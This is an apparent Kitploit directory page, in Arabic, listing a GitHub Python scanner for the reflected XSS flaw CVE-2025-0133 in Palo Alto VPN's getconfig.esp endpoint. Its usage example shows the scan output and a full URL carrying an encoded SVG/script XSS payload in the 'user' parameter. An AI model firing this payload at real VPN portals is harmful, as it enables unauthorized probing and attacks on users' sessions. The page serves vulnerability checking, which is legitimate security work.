Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-0133-exploit — نص Python لكشف ثغرة XSS المنعكسة CVE-2025-0133 في Palo Alto VPN عن طريق فحص نقطة نهاية getconfig.esp وحقن حمولات XSS. | Kitploit
أدوات/GitHubGitHub/shawarkhanethicalhacker/cve-2025-0133-exploit
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubshawarkhanethicalhacker/cve-2025-0133-exploit

CVE-2025-0133-exploit

نص Python لكشف ثغرة XSS المنعكسة CVE-2025-0133 في Palo Alto VPN عن طريق فحص نقطة نهاية getconfig.esp وحقن حمولات XSS.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

فحص CVE-2025-0133

نص برمجي مكتوب بلغة بايثون للتحقق فقط من وجود ثغرة CVE-2025-0133 من نوع البرمجة النصية عبر المواقع المنعكسة (Reflected Cross-Site Scripting) التي تحدث في Palo Alto. يتم اكتشاف الملف getconfig.esp واختباره بحثًا عن XSS باستخدام النص البرمجي المقدم.

الاستخدام:

root@kitploit:~
darkfear@b0x:~/CVE-2025-0133-exploit$ python3 cve-2025-0133_scan.py -u https://target.com
[*] Sending initial probe to https://target.com/ssl-vpn/getconfig.esp
[+] Target is using "Palo Alto". Testing XSS...
[*] Sending XSS payload...
[+] Target is VULNERABLE to reflected XSS.
[+] URL: https://target.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
تنزيل الأداة